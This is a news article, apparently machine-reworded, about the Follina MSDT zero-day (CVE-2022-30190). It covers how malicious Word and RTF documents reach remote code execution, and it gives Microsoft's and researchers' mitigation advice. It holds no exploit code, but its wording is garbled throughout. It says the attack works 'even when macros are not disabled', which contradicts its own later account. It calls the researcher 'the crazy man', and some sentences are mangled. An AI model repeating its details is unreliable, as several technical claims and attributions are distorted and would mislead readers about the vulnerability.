Attackers are actively exploiting an unfixed and easy-to-exploit vulnerability within the Microsoft Support Diagnostic Tool (MSDT) in Windows which allows remote execution of code in Office documents, even when macros are not disabled.

The vulnerability is present in all current supported Windows versions and can be exploited using Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus according to security researchers who have examined the vulnerability.

The attackers can exploit the zero-day flaw called “Follina” which allows remote execution of arbitrary software using Windows systems. Microsoft has raised concerns about the vulnerability, allowing attackers to “install applications that view, modify or erase data or create new accounts within the manner permitted by users’ rights.” Researchers have reported that they have seen attacks that exploit the vulnerability that exploit the flaw in India and Russia that date back at least one month.

Microsoft on Monday assigned the flaw a CVE identifier – CVE-2022-30190, after initially calling it a security issue back in April. That was when the crazy man who is a security researcher from the APT’s threat-hunting organization Shadow Chaser Group, first revealed open exploit of the flaw. While the company’s announcement stated that the flaw was widely known and being actively exploited, it didn’t mention the flaw as an immediate threat.

In a blog entry, Microsoft recommended that organizations disable this MSDT URL protocol to reduce the problem and stated that it will release updates in the future, without specifying any dates. Microsoft said that its Protected View feature in Microsoft Office, as well as Microsoft Office’s Application Guard for Office, both will stop attacks trying to exploit the vulnerability.

MSDT is a Windows software that gathers and relays data from the user’s computer to Microsoft support personnel so that they can diagnose and analyze problems that users might have encountered in their system. According to Microsoft, the vulnerability is activated when an Office program such as Word connects to MSDT via an URL-based protocol. “An attacker who can exploit this vulnerability could execute any code that is arbitrary with the permissions of the app that calls,” the company noted.

Although the security researcher of the Shadow Chaser Group first notified Microsoft Security Response Center about the vulnerability over one month back, the vulnerability got a lot of attention during the weekend when a researcher discovered the malicious Word document that attempted to exploit the vulnerability.

Researcher Kevin Beaumont analyzed the document and found it used Microsoft’s remote templates feature within Word to access an HTML file from an external Web server. The file that was retrieved utilized Microsoft MSDT URL protocol to download the code to execute a PowerShell script. Beaumont discovered that the document was running code even with macros turned off. The security researcher found at least two other malicious Word documents in the wild attempting to exploit Follina going back to April.

In addition, Beaumont and other researchers discovered that the attack method gave threat actors the ability to circumvent this “Protected View” mechanism within Office that alerts users about content downloaded from the Internet and requires an additional click from them to open.

According to Malwarebytes, the warning can be avoided by changing the document into a Rich Text Format (RTF) document. This way, the malware can execute without the user being required to access the document through the preview tab within Explorer.

“RTF Files are the particular format that allows documents to be seen inside Windows Explorer” says Jerome Segura, senior director of threat intelligence at Malwarebytes.

“When this occurs, Explorer will call out the most process that is being exploited, without warnings or notifications,” he says. In reality, the preview pane can be a dangerous feature since it allows Zero-Click attacks. “We advise users to remove it from Explorer and also email clients such as Outlook.”

Johannes Ullrich, dean of research at the SANS Institute, says that MSDT’s vulnerability isn’t a big issue. However, the fact that it could be exploited through Microsoft Office is troubling. All a user has to do is open a specially designed Word document and in some instances simply preview it to allow remote execution of code, he claims. It opens the door to possible widespread breaches, particularly considering that many exploits have been out in the wild for over a month at this point.

“There are a variety of tutorials, examples, and scripts that explain ways to attack this security flaw. Implementing these methods is simple, Ullrich says. He refers to a malicious document that exploits Follina that SANS discovered recently. It claimed to include quotes for mobile phone costs from the reseller. The vulnerability worked, even though it is believed to have been created by a fairly inexperienced threat actor. “It seems to have been made by a beginner attacker, as it does not even take out some of the remarks that were included in this malicious file,” Ullrich says.

He advises that businesses immediately follow Microsoft’s guidelines and deactivate MSDT’s MSDT URL-based protocol. “This breaks the connection that exists between Office as well as the tool for diagnosing,” he says. While MSDT is vulnerable, the flaw in MSDT remains however, it will no longer be activated when opening malicious documents He states. SANS suggests that businesses disable their Preview Pane in Windows Explorer.

Dray Agha, ThreatOps Analyst at Huntress who did an in-depth analysis of the vulnerability, says that attackers can exploit Follina to raise privileges and move across different environments to cause chaos. “Hackers can change from an ordinary user to admin in a matter of minutes,” Agha says. “The vulnerability could be caused by users selecting to “preview” the content of a specially designed maliciously provided document. It’s that easy.”

Related Valuable Posts:

• 3.6 Million MySQL Servers Found Exposed On The Internet

• Warning: Chrome Loader Targets Browser With Malicious ISO Files

• Windows Subsystem For Linux Virus Steals Browser Auth Cookies

• GitHub Attackers Stole Login Details Of 100K NPM Users

• GitHub Copilot, AI-powered Coding Tool Will Be Free For Students